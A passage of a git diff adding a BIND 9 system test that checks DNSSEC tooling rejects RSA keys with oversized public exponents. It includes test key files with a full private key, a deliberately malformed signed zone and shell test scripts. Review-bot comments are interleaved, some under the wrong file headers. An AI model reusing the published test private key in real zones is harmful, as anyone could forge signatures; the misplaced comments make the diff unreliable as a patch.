eK9cQKFRLaU4udqB8t8KSQxlNl0x9J+9bcaEzn0+579LrZUZvspfiR4DNGwr9qK+PWk+CU7/6xsWbq2zbKIEWucoR97t+E8Zhx00GCDbiu/QI2wviEcYbB2udznRv1WSIDoCWf2TXeh5G2E2ugt5F4+b56qMXmT7IudxYGPtQCY= +Created: 20220721024334 +Publish: 20220721024334 +Activate: 20220721024334 diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key new file mode 100644 index 0000000..a1f14c9 --- /dev/null 
+++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.key @@ -0,0 +1,2 @@ +; This is a zone-signing key, keyid 52810, for example. +example. IN DNSKEY 256 3 8 BwEAAAAAAAHYYy161+wCg6yFHRlyex8oVkcK+K2SBUryI1+DEKzjusH6 yLfzzlJCPGrubmD+jseKYwXfzelJkRQbMDjWbMYLHKytuPtwnJMSeVh+ a/Ore6oVPXy716EYpsEBSmVjfQyS0mGHpwrYk4QaKjJDM7Q173EFl/sE eXjHqInlzOgJbXqsCrSfA94anSt42DGhJeeIfQ8b3vqD/nCnA6C7khIt AWlfJto7d42Ev8tckjr3CrTW9tn9pHb2DKeh85rKeJBBLMYQU3jfF5KH EEsjztLGMnPLlXTteh8wKrk/0IJrot17w0FR0H2v8oG3xDXxfhJ0OeTW 7dtBHD6ISgqeJ9zt diff --git a/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private new file mode 100644 index 0000000..bbb5ad9 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/Xexample.+008+52810.private 
@@ -0,0 +1,10 @@ +Private-key-format: v1.3 +Algorithm: 8 (RSASHA256) +Modulus: 2GMtetfsAoOshR0ZcnsfKFZHCvitkgVK8iNfgxCs47rB+si3885SQjxq7m5g/o7HimMF383pSZEUGzA41mzGCxysrbj7cJyTEnlYfmvzq3uqFT18u9ehGKbBAUplY30MktJhh6cK2JOEGioyQzO0Ne9xBZf7BHl4x6iJ5czoCW16rAq0nwPeGp0reNgxoSXniH0PG976g/5wpwOgu5ISLQFpXybaO3eNhL/LXJI69wq01vbZ/aR29gynofOayniQQSzGEFN43xeShxBLI87SxjJzy5V07XofMCq5P9CCa6Lde8NBUdB9r/KBt8Q18X4SdDnk1u3bQRw+iEoKnifc7Q== +PublicExponent: AQAAAAAAAQ== +PrivateExponent: aD+JLNdCtAk1++UwcGdPslSoWq2szZHGrY+I+YfhfcBZrPP13exC40hgUgRNuYJOaJ3WMpgsKI4p8YDVNttF6LI7WNBURQhmBSwquB5BWWkoh7uR4PfKWGB0ZkDwUQcA2IdMVS4+QAKVQMmUXGnXhQI1p8duAORZp0gE71VsHTEzwf5AIEG2+f/oCjDsMJN0J7X3qktJr5ho64aMHyHf5+yKk6fFcy7wfC175SkIZ53uBfpCsFXkgq8YukXfcyoG5o4FUHheGnDwkVOzviEUHk8xweJnNNRbV6n/ck9AXzq3VSA9BbrXtRzZmre/L6tJvEnbH0EycwDkxCMlOSqGbQ== +Prime1: /hnW5M2vzAoAjx2wum98YZZ6gv1IpV88c4HDLA3vY79Qxd8FYanldxPNjgQJEPjHD5hG6tGN+cjZdXv/X+sk5j3fmCB7RKwMKcoD8A/jyH2JaQLTbXm6EBd1BCMIN+w3W+A2E6evYYyINLwMUwqRlUcAaD8HoDLK8iz6iAUhFss= +Prime2: 2gEuuug1PDnbWWFVzzMUrVXiRiFqJVTTvR3AjJVJNZPwAL4FMenh98rtI3s1zSB6P4RSyvRJ6YMOAT0ZrMxviJy76EExGgCB5F4w7g67I7VGPuA1tLn5kt5j9j5wQmdq1yMG5QpCJWr7bxjSDYvIzy2sZjZ/KTuHGtUzFUnHrCc= +Exponent1: MaDlpmDYxZ2QvM+cp58Bj160u+21qIA/UZ2ysh6102uQmYHm92481z2+AvCJuq2PpkuROMd/4i2w7L0RbfZ2MYzUFndLZ8NgmNDjNDfUzeRQl2KQdAOLK4DNXmf3mKwLO0Sbj/pxgj0vYAe9gcU4Pe8ukVuSX0nkehbDi4cjfr0= +Exponent2: cNHFlVCwvEPNVnpQCZS3iqF/D3HN8FtP2st0CrYbjQI8DYpcQUWVMqUqdqFOkYM0/qadpkX+JMlPJTjJZ8YDYYWIZGSC2ruMPIxB7DayVDBbgugmsC1isZjyApdQ44xtdNVyMYmcYeHUz5gR1x/eWdGNyjzMEvfbEjXIKbRykAM= +Coefficient: ovH/7MP64Dai8draXD3t+jl6UTchig+LDwXA2GvlZY0HVP+9yvE49VSKhoYxolL/ZmabIgzzOAyJ66SyYq31ozxbpKrBGiFdzAbgkJgFIbdYMgfLHXNkH1vissGeY0KdS5ee6sKDfk1VmE94UOVHi11oslvnTiG2RF/I3koYV7Q= diff --git a/bin/tests/system/rsabigexponent/ns2/dsset-example.in b/bin/tests/system/rsabigexponent/ns2/dsset-example.in new file mode 100644 index 0000000..9ad254b --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/dsset-example.in 
@@ -0,0 +1 @@ +example. IN DS 51650 8 2 F225122667540159A30620B2D0888036BDF76276D245DE3453C883F0C3276705 diff --git a/bin/tests/system/rsabigexponent/ns2/example.db.bad b/bin/tests/system/rsabigexponent/ns2/example.db.bad new file mode 100644 index 0000000..b105978 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/example.db.bad 
@@ -0,0 +1,156 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +example. 300 IN SOA mname1. . ( + 2012050601 ; serial + 3600 ; refresh (1 hour) + 600 ; retry (10 minutes) + 604800 ; expire (1 week) + 3600 ; minimum (1 hour) + ) + 300 RRSIG SOA 8 1 300 ( + 20361231235959 20000101000000 52810 example. + IfZrUTjdr4Ull5MSQW4eHxrub6X5O8VWB3vG + kg6TBT8f2Aw4hLcwT0X47xRqL9nU1kKA3qpu + mi71wqiZPbYI+suHYGuqRO/V6YujdQRpLhGS + gTpLmETa46unkMDY6sze41AlCyzR79yaDxVS + +pS2V1AVYzQzzeswJXHwSLO5HKtClPL3izpV + AJD1+dL0UZRs9yOqbxU1RgvASPFEt+1Wd2p6 + qwyeadJ7PB0PL7QQXSDsQ09Ms1BGoKq5p6Os + HtgXPo+aZQR2gczm3Yals9I1tZnk/ZM86aS0 + 63NrEEUQycMNCr100WgWzYQzO90SmJMqpdeZ + fxzlRQbY7jN4qRbM7A== ) + 300 NS ns2.example. + 300 RRSIG NS 8 1 300 ( + 20361231235959 20000101000000 52810 example. + VUPhDucH6rlx93V13b7OSAQ6fE/9jlxhCTXv + peBD69WOa4jZHMZf60gqy10gLVMx35gZdEaU + cJqaBcAniSwPY3a7mxclMja7fmuCB9wcSbiP + pwk5KIYSgIvoWp3ro2I19C0IDQDVWtH1xqdQ + Dv+3MV39Zpf0AnXB05mBopI2DQI9mYHCnmis + F3pfcfs+h/ipyodE5kccBBRvtfKWHly342Xe + azHKM4eyuGj9NLwuwsoVgnyQ3I9hrKVAiUjS + fQ4cxyBVhh+Wb1/VrVSbX+X9VNzQ04mcREHS + yXIPoIQBNju3dyOSTQ+VIeasRvRU8nqMS/1f + oeqj5ehTjtfejF6Jfw== ) + 300 NSEC a.example. NS SOA RRSIG NSEC DNSKEY + 300 RRSIG NSEC 8 1 300 ( + 20361231235959 20000101000000 52810 example. 
+ bG90DOCaN7BhihvtCUs2eJhSHkRaV582ROQi + AbamawevX8NQGJeVpHb3t5ekQuK5EWjLFr6i + bga5TpeP8HOv3lDb8w7kb7xOrHycw5Sizws5 + PZTvtuty9nT6dZ9h4pfLNTbW+SBV904xv3JT + ZlXoxtm4JAdmKUcGiCFLjMvwbQ5SKEZq27uN + 9xCeY0CPkQmiGbTrySYFyNZsBBsL2OI5ec2V + TbQVSDhnnEhbVdMb8Yh2sTt9H/CT1yG2s4U9 + a9ccxguFzt6mk+f5ZL+WKgxkTOMOrZW3dyiI + x53dNQyZN/tczibox/LLG/SaET5wR/V5gDsh + 9DObfc9u1+of/H0lhg== ) + 300 DNSKEY 257 3 8 ( + AwEAAeeXAGBcXxSNj5X/PWT8XDBk4U9OUkZ7 + YKQBf2IN3V6OZomt/s3FUWIh70Wot+z1Ld3R + fswq1DjCaWNRFOMhs+9j3Fhc46wMZ4pnsDW1 + nLHk2TnQRdrbiuhLkQy5oNMjSRxu924XLw5y + lsuqjxE7vXcCeKSFe674roSqwo39atWsTJMD + z0FQGxlPucnXai0nHoCeC7+u1s+wLaGcpNSZ + lsab7ZnyFD4HZ3HKUCJw/Jjr5CZjqal9KdmW + SC1SINRtlAN6PX5VSiNEncnYMCdjiv+ZhRGn + +aHh1BmEWomGbAm2Jjw5mrYMgDs9lJRc5Vtg + 0YXb9OkYvxNFV4QGw1oeF+M= + ) ; KSK; alg = RSASHA256 ; key id = 51650 + 300 DNSKEY 256 3 8 ( + BwEAAAAAAAHYYy161+wCg6yFHRlyex8oVkcK + +K2SBUryI1+DEKzjusH6yLfzzlJCPGrubmD+ + jseKYwXfzelJkRQbMDjWbMYLHKytuPtwnJMS + eVh+a/Ore6oVPXy716EYpsEBSmVjfQyS0mGH + pwrYk4QaKjJDM7Q173EFl/sEeXjHqInlzOgJ + bXqsCrSfA94anSt42DGhJeeIfQ8b3vqD/nCn + A6C7khItAWlfJto7d42Ev8tckjr3CrTW9tn9 + pHb2DKeh85rKeJBBLMYQU3jfF5KHEEsjztLG + MnPLlXTteh8wKrk/0IJrot17w0FR0H2v8oG3 + xDXxfhJ0OeTW7dtBHD6ISgqeJ9zt + ) ; ZSK; alg = RSASHA256 ; key id = 52810 + 300 RRSIG DNSKEY 8 1 300 ( + 20361231235959 20000101000000 52810 example. + O4q1oueEgPoWHhrLiobGvMQLS2KHN+xxSddf + y6fqksqivRLgj0633fnEZrFtc44YueV+L4gQ + kaoWCCpR0yQH4BOw4p3FVjEgl+jXLzIc7amw + ZfKAnSOtMoTaBCQ2hN8b2ducUHgKV7ta9bca + lO0wuqqp2OOO/n9S3YMBVfrCW4jL2w1QPC+b + lm/4ka8OwqKKGAcO0d/nGeOPJZnfbddSzqEQ + C3j1tGavwBC4RAGilxw3XoyoICDp0LQR7M9a + tWAxYmMfilEEfpip9R3HhCa+ynIVsHP8yTXE + dlWM3LUZePm44aV38YeObJpRMkb8sO5VrbZn + 8hJoIs3eyguC4HKKTg== ) + 300 RRSIG DNSKEY 8 1 300 ( + 20361231235959 20000101000000 51650 example. 
+ Eaw79mOoImGg+ymMJ+9paoanUgR/Od0Pxv/X + mevid1TRbssSc2KynAToxSXRcOQwRQjto9sC + qj0pOekPPmW1I6DRlMOGDS6l0Uuk51GvUuRD + Xbr19BG73mcPuKfYHNbx6cUHvBlPilnjM803 + m9E8DK6Ba9uo/MNhgtWoWj8wQxqP2YS+HW3v + bOv/p4en9Dc5ft6ATtSYj84ejuPAKnfVbleI + fJW+qIQ7q9A24xEZ4QlWuRovjsoASVsuLnX+ + X4sQYlWBIPMQYQ8RIN1CgSRPGb603pAq9ru6 + ySpjlxHQRtdOGBNJleg9Wz612rHRd3x7BM+8 + /Lvz31Ot/JSh3u4DSQ== ) +a.example. 300 IN A 10.0.0.1 + 300 RRSIG A 8 2 300 ( + 20361231235959 20000101000000 52810 example. + zp4L0Um0guehtT+4GQaMeYx5PiwEbSRyi7sg + Xv2uFn/wFML/Df0PgCxCYkWKL2Db/j15IZON + uz2CNRG7lDMZsb+JgyLZ6R3OuSKjwzA++kUu + 8ExPpdrFHxZFMPefkU1vjf7E1yt4/aSaO23T + m0F6yFHcVfBE1DElG1vLWO6cWtSIMKjXOo15 + Zy2hHhT/7jKhqcHnwwCBHLuV9/e9OmI34H7I + Sd3Ik8dnNEjRTVbLem3tQMfQ9ZfYDHPHli+z + Z5dGgPmpyNPq5bfs7O5uCO5cNCbouFdEnc6O + DA9QiyOGba8w7vI1gHMvA+rWPpA+fTGgrVRq + 7bTfa0jTOsybR8rZjg== ) + 300 NSEC ns2.example. A RRSIG NSEC + 300 RRSIG NSEC 8 2 300 ( + 20361231235959 20000101000000 52810 example. + oh6oqdC9OIoO0jIN0x9MIBlYlzAg2LFYffrP + QlgPAtPn8A9cPCxU2i6hJ1ubqc6o1LVD7LH6 + GVj842Ytys1uO2Nwf9xXS4gbchJ6NE9IjQh6 + IoBNmlgdfprzJEJlEFx73dytakfcjc+hIj8t + b14Lu2/5BBDSamw+uVyeV8Wg2jNdrN7UEqyA + ccnhLPWHAOtspzxrmCrBDPc6Geelu8KzARs5 + qOZ/p9CKffmKL/65K/N8WWKQWVNI22tAbiWT + J1t3BNkOLUSKMvEVLFcgStV4QtFcQrSB96Hu + D2rSbAGsH5Ujmz4GTxhOSqd8OJ7XDEWlhZod + LhUBltfjmakorhGqqg== ) +ns2.example. 300 IN A 10.53.0.2 + 300 RRSIG A 8 2 300 ( + 20361231235959 20000101000000 52810 example. + sDlETJwDoWqYZdcwYBW/l+Ot4Tb3mSXJvW3R + 1fsoiq/obWZeC+bU2MszckcZKPET2CRqBD+c + uLCcOhZrcH0m25Y02SAzOOG2V12KNvWVznSz + bZw+/+ucYhxhiNKherdwpHOAdjlhG//zFHDy + sAxmrtjWO2DT9pv1Hd/Hm3aGgAYTs0ryyeyo + k05sTgdr43APFkX4SNoNXGUEt8E0uMghIvhi + mgKSQ45fZFsZeUiEfwvtQ8uAuDNOLWK49Bw5 + 184QrQ/NZ3YVyJercg7wm/jFMVkgxggiOl2q + ZCLadaSQNnsvtbwgyTktRJb5YovzZEQrH7O0 + vW/DAN1Cqa1nXw/kZA== ) + 300 NSEC example. A RRSIG NSEC + 300 RRSIG NSEC 8 2 300 ( + 20361231235959 20000101000000 52810 example. 
+ DyLuymW3Bv6irCLzfUGnz2cy1XctqfW7ycLc + 7wgDzDLNvJ6tqr8tjHKMdCODJDiG+lR5oFo7 + 8RA604OYcmJjLIAMj3fCxzBkIlH5SXRcJ86X + a8U6oXrgt6IvUMC2crdWMVgVnSWlqBS4TNNg + QhUa+vt+Em8ce3fveqh1tXm1hzysSroOQtMk + HOPAtwYR9XP4mTdbC43AU/67jsYPqXq59lm4 + sE1tmnVdhXuOk7yNAt8O2CSZGGZl5bYMC4On + IgWZP7liebXAmhmXpHbBf5/BaE9dVfvWzYTT + 4wUch+f8TDwwyTqumrlrPsVnvkQ9V0LwODox + PxWWxFAznmUMEtlo3g== ) diff --git a/bin/tests/system/rsabigexponent/ns2/example.db.in b/bin/tests/system/rsabigexponent/ns2/example.db.in new file mode 100644 index 0000000..a2a6964 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/example.db.in @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2012050601 ; serial + 3600 ; refresh + 600 ; retry + 604800 ; expire + 3600 ; minimum + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 diff --git a/bin/tests/system/rsabigexponent/ns2/named.conf.in b/bin/tests/system/rsabigexponent/ns2/named.conf.in new file mode 100644 index 0000000..7a15fd7 --- /dev/null +++ b/bin/tests/system/rsabigexponent/ns2/named.conf.in 
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db.bad";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rsabigexponent/ns2/sign.sh b/bin/tests/system/rsabigexponent/ns2/sign.sh
new file mode 100755
index 0000000..015f6a9
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns2/sign.sh
@@ -0,0 +1,29 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=example.
+infile=example.db.in
+outfile=example.db.bad
+
+for i in Xexample.+008+51650.key Xexample.+008+51650.private \
+ Xexample.+008+52810.key Xexample.+008+52810.private
+do
+ cp $i `echo $i | sed s/X/K/`
+done
+
+$SIGNER -g -s 20000101000000 -e 20361231235959 -o $zone \
+ $infile Kexample.+008+52810.key \
+ > /dev/null 2> signer.err || true
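Review bot: In ns2/sign.sh the final `$SIGNER` invocation ends in `|| true` with no comment saying that failure is the expected outcome, so a reader cannot tell from the script that tests.sh later greps `ns2/signer.err` for "out of range". I would add a comment above the command, for example `# Signing with the big-exponent ZSK is expected to fail; tests.sh checks signer.err for the range error.` Because `|| true` also hides unrelated failures such as a missing key file, that grep is the only thing distinguishing them, which is worth stating in the same comment. The `outfile` variable is assigned but never used in this script.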
diff --git a/bin/tests/system/rsabigexponent/ns3/named.conf.in b/bin/tests/system/rsabigexponent/ns3/named.conf.in
new file mode 100644
index 0000000..bc63656
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/ns3/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS3
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+ max-rsa-exponent-size 35;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/rsabigexponent/prereq.sh b/bin/tests/system/rsabigexponent/prereq.sh
new file mode 100644
index 0000000..c18f6c8
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/prereq.sh
@@ -0,0 +1,24 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $BIGKEY > /dev/null 2>&1
+then
+ rm -f Kexample.*
+else
+ echo_i "This test requires OpenSSL cryptography provider" >&2
+ echo_i "configure with --with-openssl, and make sure you disable --with-pkcs11 and --enable-native-pkcs11" >&2
+ exit 255
+fi
diff --git a/bin/tests/system/rsabigexponent/setup.sh b/bin/tests/system/rsabigexponent/setup.sh
new file mode 100644
index 0000000..53f56b9
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/setup.sh
@@ -0,0 +1,21 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+
+cd ns1 && $SHELL -e sign.sh
diff --git a/bin/tests/system/rsabigexponent/tests.sh b/bin/tests/system/rsabigexponent/tests.sh
new file mode 100644
index 0000000..c3c7a3f
--- /dev/null
+++ b/bin/tests/system/rsabigexponent/tests.sh
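Review bot: In prereq.sh, every non-zero exit from `$BIGKEY` is reported as a missing OpenSSL provider, yet bigkey.c in this commit also exits 1 when key generation or any `CHECK()` step fails. A broken build or a failed key write would therefore print the same "configure with --with-openssl" hint, and `2>&1` discards the only diagnostic that would tell them apart. The PKCS#11 branch of bigkey.c prints nothing before `return (1)`, so letting stderr through costs nothing in the expected case: `if $BIGKEY > /dev/null`.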
@@ -0,0 +1,57 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+status=0
+
+rm -f dig.out.*
+
+DIGOPTS="+tcp +noadd +nosea +nostat +nocmd +dnssec -p ${PORT}"
+
+for f in conf/good*.conf
+do
+ echo_i "checking '$f'"
+ ret=0
+ $CHECKCONF $f > /dev/null || ret=1
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+ status=`expr $status + $ret`
+done
+
+for f in conf/bad*.conf
+do
+ echo_i "checking '$f'"
+ ret=0
+ $CHECKCONF $f > /dev/null && ret=1
+ if [ $ret != 0 ]; then echo_i "failed"; fi
+ status=`expr $status + $ret`
+done
+
+echo_i "checking that RSA big exponent keys can't be loaded"
+ret=0
+grep "out of range" ns2/signer.err > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "checking that RSA big exponent signature can't validate"
+ret=0
+$DIG $DIGOPTS a.example @10.53.0.2 > dig.out.ns2 || ret=1
+$DIG $DIGOPTS a.example @10.53.0.3 > dig.out.ns3 || ret=1
+grep "status: NOERROR" dig.out.ns2 > /dev/null || ret=1
+grep "status: SERVFAIL" dig.out.ns3 > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=`expr $status + $ret`
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/run.gdb b/bin/tests/system/run.gdb
new file mode 100644
index 0000000..60981e1
--- /dev/null
+++ b/bin/tests/system/run.gdb
@@ -0,0 +1 @@
+thread apply all bt full
diff --git a/bin/tests/system/run.sh b/bin/tests/system/run.sh
new file mode 100755
index 0000000..2330d7c
--- /dev/null
+++ b/bin/tests/system/run.sh
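Review bot: In rsabigexponent/tests.sh, the last check accepts any `SERVFAIL` from 10.53.0.3 as proof that the big-exponent signature was rejected, but a resolver that cannot reach ns1 or ns2 at all returns SERVFAIL too, so the test can pass for the wrong reason. A positive control with checking disabled should tie the failure to validation: `$DIG $DIGOPTS +cd a.example @10.53.0.3 > dig.out.ns3.cd || ret=1` followed by `grep "status: NOERROR" dig.out.ns3.cd > /dev/null || ret=1`. clean.sh already removes `dig.out.*`, so no cleanup change is needed.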
@@ -0,0 +1,346 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Run a system test.
+#
+
+SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)"
+. $SYSTEMTESTTOP/conf.sh
+
+if [ "$CI_SERVER" != "yes" ] && [ "$(id -u)" -eq "0" ] && ! ${NAMED} -V | grep -q -F -- "enable-developer"; then
+ echofail "Refusing to run test as root. Build with --enable-developer to override." >&2
+ exit 1
+fi
+
+export SYSTEMTESTTOP
+
+date_with_args() (
+ date "+%Y-%m-%dT%T%z"
+)
+
+stopservers=true
+baseport=5300
+
+if [ ${SYSTEMTEST_NO_CLEAN:-0} -eq 1 ]; then
+ clean=false
+else
+ clean=true
+fi
+
+restart=false
+while getopts "knp:r-:t" flag; do
+ case "$flag" in
+ -) case "${OPTARG}" in
+ keep) stopservers=false ;;
+ noclean) clean=false ;;
+ esac
+ ;;
+ k) stopservers=false ;;
+ n) clean=false ;;
+ p) baseport=$OPTARG ;;
+ t) restart=true ;;
+ esac
+done
+shift `expr $OPTIND - 1`
+
+if [ $# -eq 0 ]; then
+ echofail "Usage: $0 [-k] [-n] [-p <PORT>] test-directory [test-options]" >&2;
+ exit 1
+fi
+
+systest=${1%%/}
+shift
+
+if [ ! -d $systest ]; then
+ echofail "$0: $systest: no such test" >&2
+ exit 1
+fi
+
+# Define the number of ports allocated for each test, and the lowest and
+# highest valid values for the "-p" option.
+#
+# The lowest valid value is one more than the highest privileged port number
+# (1024).
+#
+# The highest valid value is calculated by noting that the value passed on the
+# command line is the lowest port number in a block of "numports" consecutive
+# ports and that the highest valid port number is 65,535.
+numport=100
+minvalid=`expr 1024 + 1`
+maxvalid=`expr 65535 - $numport + 1`
+
+test "$baseport" -eq "$baseport" > /dev/null 2>&1
+if [ $? -ne 0 ]; then
+ echofail "$0: $systest: must specify a numeric value for the port" >&2
+ exit 1
+elif [ $baseport -lt $minvalid -o $baseport -gt $maxvalid ]; then
+ echofail "$0: $systest: the specified port must be in the range $minvalid to $maxvalid" >&2
+ exit 1
+fi
+
+# Name the first 10 ports in the set (it is assumed that each test has access
+# to ten or more ports): the query port, the control port and eight extra
+# ports. Since the lowest numbered port (specified in the command line)
+# will usually be a multiple of 10, the names are chosen so that if this is
+# true, the last digit of EXTRAPORTn is "n".
+PORT=$baseport
+EXTRAPORT1=`expr $baseport + 1`
+EXTRAPORT2=`expr $baseport + 2`
+EXTRAPORT3=`expr $baseport + 3`
+EXTRAPORT4=`expr $baseport + 4`
+EXTRAPORT5=`expr $baseport + 5`
+EXTRAPORT6=`expr $baseport + 6`
+EXTRAPORT7=`expr $baseport + 7`
+EXTRAPORT8=`expr $baseport + 8`
+CONTROLPORT=`expr $baseport + 9`
+
+LOWPORT=$baseport
+HIGHPORT=`expr $baseport + $numport - 1`
+
+export PORT
+export EXTRAPORT1
+export EXTRAPORT2
+export EXTRAPORT3
+export EXTRAPORT4
+export EXTRAPORT5
+export EXTRAPORT6
+export EXTRAPORT7
+export EXTRAPORT8
+export CONTROLPORT
+
+export LOWPORT
+export HIGHPORT
+
+# Start all servers used by the system test. Ensure all log files written
+# during a system test (tests.sh + potentially multiple *.py scripts) are
+# retained for each run by calling start.pl with the --restart command-line
+# option for all invocations except the first one.
+start_servers() {
+ echoinfo "I:$systest:starting servers"
+ if $restart || [ "$run" -gt 0 ]; then
+ restart_opt="--restart"
+ fi
+ if ! $PERL start.pl ${restart_opt} --port "$PORT" "$systest"; then
+ echoinfo "I:$systest:starting servers failed"
+ return 1
+ fi
+}
+
+stop_servers() {
+ if $stopservers; then
+ echoinfo "I:$systest:stopping servers"
+ if ! $PERL stop.pl "$systest"; then
+ echoinfo "I:$systest:stopping servers failed"
+ return 1
+ fi
+ fi
+}
+
+echostart "S:$systest:$(date_with_args)"
+echoinfo "T:$systest:1:A"
+echoinfo "A:$systest:System test $systest"
+echoinfo "I:$systest:PORTRANGE:${LOWPORT} - ${HIGHPORT}"
+
+if [ x${PERL:+set} = x ]
+then
+ echowarn "I:$systest:Perl not available. Skipping test."
+ echowarn "R:$systest:SKIPPED"
+ echoend "E:$systest:$(date_with_args)"
+ exit 0;
+fi
+
+$PERL testsock.pl -p $PORT || {
+ echowarn "I:$systest:Network interface aliases not set up. Skipping test."
+ echowarn "R:$systest:SKIPPED"
+ echoend "E:$systest:$(date_with_args)"
+ exit 0;
+}
+
+# Check for test-specific prerequisites.
+test ! -f $systest/prereq.sh || ( cd $systest && $SHELL prereq.sh "$@" )
+result=$?
+
+if [ $result -eq 0 ]; then
+ : prereqs ok
+else
+ echowarn "I:$systest:Prerequisites missing, skipping test."
+ echowarn "R:$systest:SKIPPED";
+ echoend "E:$systest:$(date_with_args)"
+ exit 0
+fi
+
+# Check for PKCS#11 support
+if
+ test ! -f $systest/usepkcs11 || $SHELL cleanpkcs11.sh
+then
+ : pkcs11 ok
+else
+ echowarn "I:$systest:Need PKCS#11, skipping test."
+ echowarn "R:$systest:PKCS11ONLY"
